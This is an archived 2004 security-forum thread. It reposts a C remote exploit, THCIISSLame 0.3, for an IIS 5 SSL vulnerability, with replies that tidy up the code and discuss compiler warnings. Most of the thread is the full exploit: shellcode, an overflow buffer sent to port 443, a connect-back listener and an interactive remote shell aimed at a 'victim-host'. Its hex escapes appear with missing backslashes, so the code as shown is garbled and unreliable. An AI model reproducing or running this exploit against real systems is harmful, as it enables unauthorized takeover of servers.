hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Thciisssl V.0.3
GovernmentSecurity.org > The Archives > Exploit Articles
COM
May 3 2004, 02:00 PM
/*****************************************************************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
/* v0.2 - This little update uses a connectback shell ! */
/* v0.1 - First release with portbinding shell on 31337 */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "xebx0f"
#define greetings_to_microsoft "x54x48x43x4fx57x4ex5ax49x49x53x21"

char sslshit[] = "x80x62x01x02xbdx00x01x00x01x00x16x8fx82x01x00x00x00";

char shellcode[] =
"xebx25xe9xfax99xd3x77xf6x02x06x6cx59x6cx59xf8"
"x1dx9cxdex8cxd1x4cx70xd4x03x58x46x57x53x32x5f"
"x33x32x2ex44x4cx4cx01xebx05xe8xf9xffxffxffx5d"
"x83xedx2cx6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"
"xadx8bx78x08x8dx5fx3cx8bx1bx01xfbx8bx5bx78x01"
"xfbx8bx4bx1cx01xf9x8bx53x24x01xfax53x51x52x8b"
"x5bx20x01xfbx31xc9x41x31xc0x99x8bx34x8bx01xfe"
"xacx31xc2xd1xe2x84xc0x75xf7x0fxb6x45x09x8dx44"
"x45x08x66x39x10x75xe1x66x31x10x5ax58x5ex56x50"
"x52x2bx4ex10x41x0fxb7x0cx4ax8bx04x88x01xf8x0f"
"xb6x4dx09x89x44x8dxd8xfex4dx09x75xbexfex4dx08"
"x74x17xfex4dx24x8dx5dx1ax53xffxd0x89xc7x6ax02"
"x58x88x45x09x80x45x79x0cxebx82x50x8bx45x04x35"
"x93x93x93x93x89x45x04x66x8bx45x02x66x35x93x93"
"x66x89x45x02x58x89xcex31xdbx53x53x53x53x56x46"
"x56xffxd0x89xc7x55x58x66x89x30x6ax10x55x57xff"
"x55xe0x8dx45x88x50xffx55xe8x55x55xffx55xecx8d"
"x44x05x0cx94x53x68x2ex65x78x65x68x5cx63x6dx64"
"x94x31xd2x8dx45xccx94x57x57x57x53x53xfexcax01"
"xf2x52x94x8dx45x78x50x8dx45x88x50xb1x08x53x53"
"x6ax10xfexcex52x53x53x53x55xffx55xf0x6axffxff"
"x55xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;

unsigned short cbport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploitn");
printf("tested on Windows 2000 Server german/english SP4n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)n");

if(argc<4 || argc>4)
usage();

badbuf = malloc(352);
memset(badbuf,0,352);

printf("n
building buffern");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);

strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4);

cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

strcat(p,shellcode);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %sn",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);

printf("
connecting the targetn");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,351,0);
printf("
exploit sendn");

mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
printf("bind error() %dn",WSAGetLastError());
exit(-1);
}

rc=listen(sock2,1);
if(rc!=0)
{
printf("listen error()n");
exit(-1);
}

printf("
waiting for shelln");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf("
Exploit successful ! Have fun !n");
printf("
--------------------------------------------------------------------nn");
shell(sock3);
}
}
else
{
printf("nCan't connect to ssl port 443!n");
exit(-1);
}

shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);

free(badbuf);

exit(0);
}

void usage()
{
unsigned int a;
printf("nUsage: <victim-host> <connectback-ip> <connectback port>n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337nn");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...n");
return;
}
}
}
}


Thats all blink.gif
Psychotec
May 3 2004, 03:33 PM
lol wtf is wrong with this code??

these are wrong..or at least i never saw this in a code, so i think these can be fixed:
CODE
printf("n
building buffern");


CODE
printf("
connecting the targetn");


CODE
printf("
exploit sendn");


CODE
printf("
waiting for shelln");


CODE
printf("
Exploit successful ! Have fun !n");
printf("
--------------------------------------------------------------------nn");


so this should be the right one:

CODE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "xebx0f"
#define greetings_to_microsoft "x54x48x43x4fx57x4ex5ax49x49x53x21"

char sslshit[] = "x80x62x01x02xbdx00x01x00x01x00x16x8fx82x01x00x00x00";

char shellcode[] =
"xebx25xe9xfax99xd3x77xf6x02x06x6cx59x6cx59xf8"
"x1dx9cxdex8cxd1x4cx70xd4x03x58x46x57x53x32x5f"
"x33x32x2ex44x4cx4cx01xebx05xe8xf9xffxffxffx5d"
"x83xedx2cx6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"
"xadx8bx78x08x8dx5fx3cx8bx1bx01xfbx8bx5bx78x01"
"xfbx8bx4bx1cx01xf9x8bx53x24x01xfax53x51x52x8b"
"x5bx20x01xfbx31xc9x41x31xc0x99x8bx34x8bx01xfe"
"xacx31xc2xd1xe2x84xc0x75xf7x0fxb6x45x09x8dx44"
"x45x08x66x39x10x75xe1x66x31x10x5ax58x5ex56x50"
"x52x2bx4ex10x41x0fxb7x0cx4ax8bx04x88x01xf8x0f"
"xb6x4dx09x89x44x8dxd8xfex4dx09x75xbexfex4dx08"
"x74x17xfex4dx24x8dx5dx1ax53xffxd0x89xc7x6ax02"
"x58x88x45x09x80x45x79x0cxebx82x50x8bx45x04x35"
"x93x93x93x93x89x45x04x66x8bx45x02x66x35x93x93"
"x66x89x45x02x58x89xcex31xdbx53x53x53x53x56x46"
"x56xffxd0x89xc7x55x58x66x89x30x6ax10x55x57xff"
"x55xe0x8dx45x88x50xffx55xe8x55x55xffx55xecx8d"
"x44x05x0cx94x53x68x2ex65x78x65x68x5cx63x6dx64"
"x94x31xd2x8dx45xccx94x57x57x57x53x53xfexcax01"
"xf2x52x94x8dx45x78x50x8dx45x88x50xb1x08x53x53"
"x6ax10xfexcex52x53x53x53x55xffx55xf0x6axffxff"
"x55xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;

unsigned short cbport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc<4 || argc>4)
usage();

badbuf = malloc(352);
memset(badbuf,0,352);

printf("building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);

strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4);

cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

strcat(p,shellcode);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);

printf("connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,351,0);
printf("exploit send\n");

mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
printf("bind error() %d\n",WSAGetLastError());
exit(-1);
}

rc=listen(sock2,1);
if(rc!=0)
{
printf("listen error()\n");
exit(-1);
}

printf("waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf("Exploit successful! Have fun!\n");
printf("--------------------------------------------------------------------\n");
shell(sock3);
}
}
else
{
printf("Can't connect to ssl port 443!\n");
exit(-1);
}

shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);

free(badbuf);

exit(0);
}

void usage()
{
unsigned int a;
printf("Usage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}
chris105
May 3 2004, 05:54 PM
I think you missed a couple of bits, I got some errors but im fixing them right now I will update once they fixed (they all look easy to get round and it looks like the compiler gets round the second two automatically)

[QUOTE]
c:\documents and settings\games\desktop\tools\exploits\cpp1.c(42) : warning C4101: 'i' : unreferenced local variable
c:\documents and settings\games\desktop\tools\exploits\cpp1.c(182) : warning C4101: 'a' : unreferenced local variable
c:\documents and settings\games\desktop\tools\exploits\cpp1.c(212) : warning C4013: 'write' undefined; assuming extern returning int
c:\documents and settings\games\desktop\tools\exploits\cpp1.c(221) : warning C4013: 'read' undefined; assuming extern returning int

My bad, these were just warning not errors, still can anyone shed any light on them ?
Ecko
May 3 2004, 06:47 PM
warnings are not important you can compile trough them!
agathos
May 3 2004, 07:22 PM
the hex bytes are wrong ,too wink.gif a \ is required

like
CODE

char sslshit[] = "x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.